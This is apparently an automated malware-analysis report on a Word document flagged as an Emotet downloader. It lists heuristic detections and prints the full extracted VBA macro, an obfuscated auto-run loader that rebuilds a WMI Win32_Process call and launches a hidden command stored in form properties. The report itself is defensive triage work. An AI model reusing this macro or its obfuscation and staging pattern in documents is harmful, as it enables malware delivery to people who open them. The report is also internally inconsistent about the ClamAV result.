Verdict: MALICIOUS
Risk Score: 272
Heuristics: 9

Heuristic findings:
- ClamAV: Doc.Downloader.Emotet-7458509-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-7458509-0
- VBA macros detected (medium, OLE_VBA_MACROS, 5 related findings): Document contains VBA macro code
- VBA UserForm hidden-property command stager (critical, OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER): VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
  Matched line in script:
  Moplwywfs = Join(Split("qwh_h2bdwqwh_h2bdiqwh_h2bdnqwh_h2bdmqwh_h2bdgmqwh_h2bdtsqwh_h2bd:Wqwh_h2bdinqwh_h2bd3qwh_h2bd2_qwh_h2bd", "qwh_h2bd"), "") + Wpcelcnm.Tkeunwzdjusza + "rocess"
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
  Matched line in script:
  Set Sjjfkjzcfls = CreateObject(Rbdwrrto)
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
  Matched line in script:
  Set Vbgbcjlczlvy = GetObject(INSN & Moplwywfs)
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- Document_Open macro (low, OLE_VBA_DOCOPEN): Document_Open macro
  Matched line in script:
  Private Sub Document_open()
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts: 1
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8224 bytes |

SHA-256: 103cc589812bba8725f1d32621b0b7a0c70b003d2aeb5b7f3647bb15e82003c0

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. 206 of 309 identifiers look randomly generated (e.g. 'qwh_h2bdwqwh_h2bdiqwh_h2bdnqwh_h2bdmqwh_') — consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Wpcelcnm"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Tkeunwzdjusza, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Dim Vkfpqytfyyrsu
Dim Yybnowzai
For Sjfskvhxnyrhb = Csdnbnzqmoun To 0
Wfmshbyurpprl = xPI
Jwsugkzgnwkwn = CDbl(3)
Qacpaunqp = Tan(MyeW5A)
Ondvdvurouoh = 4 - Wyzwxelkjyp
Cbwfcynvldrtp = (3 - Vnbtyadvousr)
Eegnysps = Iqtkvhchcp
Wvqwyghlkherh = CDbl(6)
Fqjgdypkih = Tan(Hrkpsphikxbui)
Next
Dim Epygvdyqpas
Dim Viklcxhl
For Fquwlfizdcy = Csdnbnzqmoun To 0
Lvmvamrvwabr = xPI
Hynceiatpbhn = CDbl(3)
Bpzcxnzqq = Tan(MyeW5A)
Yetiqsebm = 4 - Patpurfk
Bkthbzuwtqi = (3 - Gdhlzjclzfaz)
Ithkfntxuz = Tkesksdfnlm
Bmbcesicq = CDbl(6)
Mgczbijh = Tan(Prhhvivtuw)
Next
Dim Bntqswtftvfud
Dim Nndktfjbfq
For Vzovyivelg = Csdnbnzqmoun To 0
Jkbpjpgo = xPI
Dtbvfsslna = CDbl(3)
Ygfzgmiozg = Tan(MyeW5A)
Bjdtspkkwlvut = 4 - Dlzsplwm
Jiugyjwuct = (3 - Ytxpipmklgd)
Daniofxik = Qexczzrjh
Fuacgakydfk = CDbl(6)
Jimnoyfolqzes = Tan(Lotcpqvsil)
Next
Sjjfkjzcfls
End Sub
Attribute VB_Name = "Xrfpydxbfk"
Attribute VB_Base = "0{E8D6A6C6-2BAF-4D05-B16A-00A79C17EEA2}{A3253E34-5D61-4D49-B0EB-C485ED4777B4}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Ueqdsoufggvs"
Function Elbvfewbxtip()
Dim Yzdqenohomavo
Dim Iepyxmulumis
For Vmzarkiv = Csdnbnzqmoun To 0
Chihsaonym = xPI
Zqkjenjdvuce = CDbl(3)
Bvxvmmwc = Tan(MyeW5A)
Ensuyvuajdm = 4 - Hgumfqhfens
Qcahvxuueruo = (3 - Abupnrep)
Zrlojazaveer = Ipovcpzy
Hdjyfgoanih = CDbl(6)
Gkesutavic = Tan(Xdjnzsbqv)
Next
Otuzexnwdaa = Wpcelcnm.Tkeunwzdjusza
Dim Ojhymdixps
Dim Gnuzzpljoe
For Cvjxaxnniyya = Csdnbnzqmoun To 0
Cwgszqfzzrfq = xPI
Fjyjypwru = CDbl(3)
Semeiotwhmodv = Tan(MyeW5A)
Mcvsrjtjiyzo = 4 - Vlcuvhmsvqc
Wrqgcedcuvbt = (3 - Vefjaqilblizy)
Gepfowrrswkz = Paahiroq
Vmlqfxcg = CDbl(6)
Orlozcdnmm = Tan(Xklkhspqfqw)
Next
Fbkkbllyh = Otuzexnwdaa + Xrfpydxbfk.Xqydzwclglloa + Xrfpydxbfk.Auittfls + Xrfpydxbfk.Tbqpogqafxre
Dim Yuagbzltvajh
Dim Mizowiiepx
For Eaxdnthdtkig = Csdnbnzqmoun To 0
Dkvfcheqzvadx = xPI
Tfcliulwrn = CDbl(3)
Cqczsqxf = Tan(MyeW5A)
Junoobcdjv = 4 - Zeguoeroesmh
Wvhnzolkwixug = (3 - Oduniqxtybto)
Qhgmoegww = Ioixwuyhuposu
Ybjlgadgfa = CDbl(6)
Rfnsgzozc = Tan(Bhvgnobpmtfgf)
Next
Wohzgfledt = Fbkkbllyh + Xrfpydxbfk.Scueqyzrze + Xrfpydxbfk.Dakwruximp
Dim Ixpjzknxpm
Dim Zohlddmlvy
For Gzgosznz = Csdnbnzqmoun To 0
Yfphqoydhiaq = xPI
Bdwikvqkeocae = CDbl(3)
Pzdrfqbww = Tan(MyeW5A)
Mrqlapghnoceo = 4 - Nbaeqkzy
Xzmizhavmj = (3 - Sontwmrnupvc)
Vrwnntyccquzn = Icmetimr
Mgenidkfami = CDbl(6)
Vfvqlwzwzkklm = Tan(Jqjazzamtounj)
Next
Elbvfewbxtip = Aqtjfpyvasena + Wohzgfledt + Aqtjfpyvasena
Dim Xrhcbprq
Dim Jyfsevqpi
For Utljxmnqhmqx = Csdnbnzqmoun To 0
Noeuarvois = xPI
Hhhyvdtjdxwse = CDbl(3)
Alssbwgqg = Tan(MyeW5A)
Iiyfktbzffij = 4 - Dzipslqxmud
Gbaqblbvlkxmc = (3 - Xzrbbfxwx)
Adkwdcutuyf = Xqrspldqu
Mcboujecpnlxk = CDbl(6)
Usjwgslke = Tan(Ehmyxgsljab)
Next
End Function
Function Sjjfkjzcfls()
Dim Xxpjresegnje
Dim Uxptvvnt
For Srdvqcclwlbfi = Csdnbnzqmoun To 0
Izmhowfbb = xPI
Phavidrrrzbxo = CDbl(3)
Xinbppbnnw = Tan(MyeW5A)
Qbmqcqsmvl = 4 - Yorwfhcx
Zxnzpiot = (3 - Hrapeizgvrpli)
Byehgudi = Pdcakybz
Gnbrxhvcmonp = CDbl(6)
Ojjmgeejnnpfx = Tan(Somgownxmk)
Next
Moplwywfs = Join(Split("qwh_h2bdwqwh_h2bdiqwh_h2bdnqwh_h2bdmqwh_h2bdgmqwh_h2bdtsqwh_h2bd:Wqwh_h2bdinqwh_h2bd3qwh_h2bd2_qwh_h2bd", "qwh_h2bd"), "") + Wpcelcnm.Tkeunwzdjusza + "rocess"
Dim Bmcmitvtkrlw
Dim Jwklhskoevv
For Pdlwftscylfe = Csdnbnzqmoun To 0
Tzsdrpfljgqaf = xPI
Hhqbyfpyufc = CDbl(3)
Kkegovqols = Tan(MyeW5A)
Qdtfgenkoreo = 4 - Qdayxoltazbj
Rzvpmiibwt = (3 - Otwtgqcu)
Nnuphwcudw = Tpwpcvmo
Kwarxhslg = CDbl(6)
Emhuxblzb = Tan(Hkzhwrnhiqf)
Next
Set Vbgbcjlczlvy = GetObject(INSN & Moplwywfs)
Dim Cdolanzswn
Dim Etxcjnatizy
For Vpsupawpw = Csdnbnzqmoun To 0
Fftxremlpsirj = xPI
Vcnddfdfex = CDbl(3)
Hmkzimaxeuccd = Tan(MyeW5A)
Vnnxidffub = 4 - Rcaoakge
Szfjtebzl = (3 - Shrrayubgqx)
Iuefcrxhnq = Szjaduqtmzv
Zmmdsovkwazav = CDbl(6)
Cjeqwdhykacw = Tan(Wjyvicfkevczc)
Next
Jlpbkzpfo = Moplwywfs + Xrfpydxbfk.Gvdfelhh.ControlTipText + Xrfpydxbfk.Ojywqtmxik.ControlTipText
Dim Wicddkmosr
Dim Wcgtdauxechzl
For Gpdabytlpw = Csdnbnzqmoun To 0
Ffrwkyvxzbn = xPI
Azeubcrmz = CDbl(3)
Oqcbcrqxwmpsm = Tan(MyeW5A)
Bqtlebetazpro = 4 - Cfzshtvuvhl
Vlhsoebb = (3 - Bxkwcbmacdg)
Stycgwydtl = Osxdjsojqyvxx
Ihimvlboypbv = CDbl(6)
Kiliyojpxsls = Tan(Tyafneqwkyfm)
Next
Rbdwrrto = Jlpbkzpfo + Wpcelcnm.Tkeunwzdjusza
Dim Zefdcpajxyr
Dim Yzawjryueuwkq
For Dipnuwqeg = Csdnbnzqmoun To 0
Hndfcjpfpuy = xPI
Tfuujismg = CDbl(3)
Oidrcivui = Tan(MyeW5A)
Lrzrmvkume = 4 - Uobvuxvea
Qtgycgzeqpjud = (3 - Wwblfbfbjcam)
Mojqtixgxhnna = Ltyacazcpovl
Vbuyhdazejnup = CDbl(6)
Ysbljyicmywn = Tan(Bywfkbftosqs)
Next
Set Sjjfkjzcfls = CreateObject(Rbdwrrto)
Dim Bxgutsihtr
Dim Mggkcyfliros
For Cvucehyu = Csdnbnzqmoun To 0
Wcyntnsaljf = xPI
Bgkuqbjiod = CDbl(3)
Mmrnswsbqna = Tan(MyeW5A)
Rvznghyyjtvt = 4 - Svghzjxha
Tnmcwngkczf = (3 - Ivqqdtwteozg)
Aqujuyant = Ngojlimklzdtg
Etoymwmhf = CDbl(6)
Plluubeuq = Tan(Ktgmvxgxw)
Next
Sjjfkjzcfls.XSize = False
Dim Oehznrqrd
Dim Qefwcpzeedg
For Rawltocj = Csdnbnzqmoun To 0
Ktezmztraqntq = xPI
Vpwjzchrfhmu = CDbl(3)
Pphqivdyqnekl = Tan(MyeW5A)
Oxjrsxyfzztcc = 4 - Zfptkbgdijqx
Foqbtqkddm = (3 - Jhqosbzynzv)
Viuahcaywukcb = Gwbcstsym
Oxawftyfyiq = CDbl(6)
Kasmnflrsrsry = Tan(Ccjhgqnd)
Next
Sjjfkjzcfls.YSize = False
Dim Aybgwpgadsr
Dim Bvsszuhn
For Liymejjnt = Csdnbnzqmoun To 0
Spxbbjnudav = xPI
Cruohsqbgtqxy = CDbl(3)
Qufxbkjg = Tan(MyeW5A)
Ylutrepmykn = 4 - Fadomvhdchld
Xuotlzxihwip = (3 - Lzrpbazw)
Wknmweipijrrk = Owwthgxg
Cpwcivbwswam = CDbl(6)
Cnsgfiupzn = Tan(Cdqpzdgu)
Next
Do While Vbgbcjlczlvy.Create(Null & Elbvfewbxtip, Xhghpojzzvolx, Sjjfkjzcfls, Xvfdlnnoqsfoz)
Loop
Dim Pmwfnzljaouwt
Dim Xgntzlhginv
For Eszqdyqlgs = Csdnbnzqmoun To 0
Heojjacglucvr = xPI
Igorszbfio = CDbl(3)
Uueqnhwrgswz = Tan(MyeW5A)
Uyjqeywlifsb = 4 - Fyguehhlgdonv
Pjoezfdws = (3 - Vjmzymuzm)
Cufkirfbqd = Svdxosbco
Lyzhfctvcydhu = CDbl(6)
Wmqqtbndtdu = Tan(Glfxsvumj)
Next
End Function